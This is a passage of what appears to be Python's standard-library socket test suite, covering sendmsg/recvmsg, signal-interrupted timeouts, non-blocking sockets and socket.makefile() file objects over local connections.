class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
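# Illustrative sketch, not part of the test suite: how InterruptedTimeoutBase
# above uses SIGALRM to break out of a blocking socket call.  Because the
# installed handler raises, the interrupted call propagates that exception
# instead of being retried after EINTR (PEP 475).  POSIX-only; assumes
# signal.setitimer() is available.
def _sigalrm_interrupt_sketch(sock, alarm_time=0.05):
    import signal
    def handler(signum, frame):
        raise InterruptedError("interrupted by SIGALRM")
    old_handler = signal.signal(signal.SIGALRM, handler)
    try:
        signal.setitimer(signal.ITIMER_REAL, alarm_time)
        try:
            return sock.recv(1024)      # expected to raise InterruptedError
        finally:
            signal.setitimer(signal.ITIMER_REAL, 0)
    finally:
        signal.signal(signal.SIGALRM, old_handler)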
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) is interrupted by SIGALRM; the
        # handler raises ZeroDivisionError, which must propagate out of the
        # blocked call instead of the call being silently retried.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, is interrupted
        # by SIGALRM; the handler raises ZeroDivisionError, which must
        # propagate out of the blocked call.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
            # When a Python socket has a non-zero timeout, it's switched
            # internally to a non-blocking mode.  Later, sock.sendall(),
            # sock.recv(), and other socket operations use a select() call
            # and handle EWOULDBLOCK/EAGAIN to enforce the timeout (see the
            # simplified sketch after this test class).
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
if not (sys.platform == 'OpenVMS'): # OpenVMS fcntl does not work with O_NONBLOCK
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: when accept() is called on a listening socket that has a
        # timeout and the default timeout is None, the resulting socket must
        # be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: when accept() is called on a listening socket that has a
        # timeout and the default timeout is not None, the resulting socket
        # must inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
        # the client didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
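# Illustrative sketch, not part of the test suite, referenced from
# assert_sock_timeout() above: a simplified model of how a socket timeout is
# enforced.  The file descriptor stays non-blocking and the caller waits with
# select(), retrying after EWOULDBLOCK/EAGAIN until the deadline expires.
# Assumes `sock` has already been put in non-blocking mode; this is a model
# of the behaviour, not the actual CPython implementation.
def _recv_with_deadline_sketch(sock, nbytes, timeout):
    import select, time
    deadline = time.monotonic() + timeout
    while True:
        try:
            return sock.recv(nbytes)
        except BlockingIOError:          # EWOULDBLOCK / EAGAIN
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                raise TimeoutError("timed out")
            select.select([sock], [], [], remaining)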
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(TimeoutError, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
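# Illustrative sketch, not part of the test suite: how the read_mode /
# write_mode / encoding attributes of the file-object test cases above map
# onto socket.makefile() arguments.  'rb'/'wb' give binary file objects;
# 'r'/'w' wrap the socket in a text layer with the given encoding and newline
# handling.  Uses a local socketpair, so no network setup is assumed.
def _makefile_modes_sketch():
    a, b = socket.socketpair()
    with a, b:
        writer = a.makefile('w', encoding='utf-8', newline='')
        reader = b.makefile('r', encoding='utf-8', newline='')
        with writer, reader:
            writer.write('hello\n')
            writer.flush()
            return reader.readline()    # -> 'hello\n'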
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise TimeoutError('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
